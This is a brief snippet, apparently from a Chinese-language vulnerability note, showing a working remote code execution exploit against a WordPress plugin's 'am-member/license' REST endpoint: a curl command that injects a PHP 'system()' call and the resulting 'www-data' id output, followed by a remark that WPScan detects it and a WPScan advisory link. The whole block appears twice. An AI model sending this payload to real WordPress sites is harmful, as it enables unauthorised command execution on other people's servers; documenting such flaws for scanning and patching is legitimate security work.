$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
WPscan已经支持扫描
https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2
$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
WPscan已经支持扫描
https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2